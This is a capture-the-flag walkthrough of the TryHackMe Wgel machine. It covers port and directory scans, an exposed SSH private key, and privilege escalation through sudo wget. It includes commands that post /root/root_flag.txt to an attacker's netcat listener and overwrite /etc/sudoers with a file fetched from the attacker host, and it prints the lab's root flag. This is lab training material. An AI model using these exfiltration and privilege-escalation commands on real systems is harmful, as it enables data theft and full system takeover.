TryHackMe Wgel CTF Exfiltrate the root flag
Wgel CTF is a TryHackMe machine, after listing the website we found a private
key that gave us SSH access. We escalate privileges by modifying the sudoers
file with Wget.
First we start with NMAP tool. TCP port
scan, we see two open ports http (80) and ssh (22).
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/wgel-again] └─$ sudo nmap -O 10.10.56.251 [sudo] password for hackerboy: Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-28 23:49 IST Nmap scan report for 10.10.56.251 Host is up (0.21s latency). Not shown: 998 closed tcp ports (reset) PORT STATE SERVICE 22/tcp open ssh 80/tcp open http No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). TCP/IP fingerprint: OS:SCAN(V=7.93%E=4%D=7/28%OT=22%CT=1%CU=40458%PV=Y%DS=2%DC=I%G=Y%TM=64C406D OS:2%P=x86_64-pc-linux-gnu)SEQ(SP=105%GCD=1%ISR=107%TI=Z%CI=I%TS=A)SEQ(SP=1 OS:05%GCD=1%ISR=107%TI=Z%CI=I%II=I%TS=A)OPS(O1=M508ST11NW6%O2=M508ST11NW6%O OS:3=M508NNT11NW6%O4=M508ST11NW6%O5=M508ST11NW6%O6=M508ST11)WIN(W1=68DF%W2= OS:68DF%W3=68DF%W4=68DF%W5=68DF%W6=68DF)ECN(R=Y%DF=Y%T=40%W=6903%O=M508NNSN OS:W6%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%D OS:F=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O OS:=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W OS:=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%R OS:IPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S) Network Distance: 2 hops OS detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 31.04 seconds ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/wgel-again] └─$
HTTP
Apache is running on port 80.
We analyzed the source code of the apache index and found a comment that is not common in the apache index.
GOBUSTER
Directory and file scanning with gobuster.
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/wgel-again] └─$ sudo gobuster dir -u http://10.10.56.251/ -w /usr/share/dirb/wordlists/common.txt -t 25 -x php,html,txt -q [sudo] password for hackerboy: /.html (Status: 403) [Size: 277] /.htpasswd.txt (Status: 403) [Size: 277] /index.html (Status: 200) [Size: 11374] /index.html (Status: 200) [Size: 11374] /server-status (Status: 403) [Size: 277] /sitemap (Status: 301) [Size: 314] [--> http://10.10.56.251/sitemap/] ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/wgel-again] └─$
Page web and /sitemap/
Again we do a scan with gobuster but now to the page we found ( /sitemap/).
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/wgel-again] └─$ sudo gobuster dir -u http://10.10.56.251/sitemap -w /usr/share/dirb/wordlists/common.txt -t 25 -x php,html,txt -q [sudo] password for hackerboy: /.htpasswd.txt (Status: 403) [Size: 277] /.htpasswd.php (Status: 403) [Size: 277] /.ssh (Status: 301) [Size: 319] [--> http://10.10.56.251/sitemap/.ssh/] /about.html (Status: 200) [Size: 12232] /blog.html (Status: 200) [Size: 12745] /contact.html (Status: 200) [Size: 10346] /css (Status: 301) [Size: 318] [--> http://10.10.56.251/sitemap/css/] /fonts (Status: 301) [Size: 320] [--> http://10.10.56.251/sitemap/fonts/] /images (Status: 301) [Size: 321] [--> http://10.10.56.251/sitemap/images/] /index.html (Status: 200) [Size: 21080] /index.html (Status: 200) [Size: 21080] /js (Status: 301) [Size: 317] [--> http://10.10.56.251/sitemap/js/] /services.html (Status: 200) [Size: 10131] /shop.html (Status: 200) [Size: 17257] /work.html (Status: 200) [Size: 11428] ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/wgel-again] └─$
SSH - Jessie
We start session with Jessieand the private key
we found earlier, we get an ssh shell and our first flag user_flag.txt .
An id_rsa key can be used as an alternative method to log into SSH. Meaning,
we do not need a password! Maybe we can try this against the Jessie user found
earlier?
Initial Access
Download the id_rsa key from the webserver with
wget:
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/wgel-again] └─$ wget http://10.10.56.251/sitemap/.ssh/id_rsa -O ./id_rsa.txt --2023-07-29 01:22:03-- http://10.10.56.251/sitemap/.ssh/id_rsa Connecting to 10.10.56.251:80... connected. HTTP request sent, awaiting response... 200 OK Length: 1675 (1.6K) Saving to: ‘./id_rsa.txt’ ./id_rsa.txt 100%[=====================================================================================>] 1.64K --.-KB/s in 0s 2023-07-29 01:22:03 (43.1 MB/s) - ‘./id_rsa.txt’ saved [1675/1675] ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/wgel-again] └─$
Now login as Jessie:
$ chmod 600 id_rsa.txt
$ sudo chown hackerboy:hackerboy id_rsa.txt
$ ssh
jessie@10.10.56.251 -i id_rsa.txt
Privilege Escalation
Next, we need to read the root user flag. In order to do so, we need
root privileges.
A good first check is to run sudo -l to list what
we can run as root:
Click on this link to learn about sudo -l (all about enumeration) -
CLICK HERE
There are two entries here: (1) we can run all commands as root, but
need to know Jessie’s password, and (2) we can run wget as root.
According
to the amazing
GTFOBins repo we can use wget to read files. We’ll use this technique to read the root
user’s flag:
sudo /usr/bin/wget --post-file=/root/root_flag.txt http://10.9.22.119:4545
# This is our system IP 10.9.22.119
# we will same port from both side 4545
Netcat listener
nc -lvp 4545
Root flag - b1b968b37519ad1daa6408188649263d
And in the wgel machine we execute the wget command with sudo which will
overwrite the file /etc/sudoers.
We are located in the folder
/etc/and we execute:
sudo /usr/bin/wget 10.9.22.119:4545/sudoers
--output-document=sudoers
Disclaimer
All tutorials are for informational and educational purposes only and have been made using our own routers, servers, websites and other vulnerable free resources. we do not contain any illegal activity. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. Hacking Truth is against misuse of the information and we strongly suggest against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used. We do not promote, encourage, support or excite any illegal activity or hacking.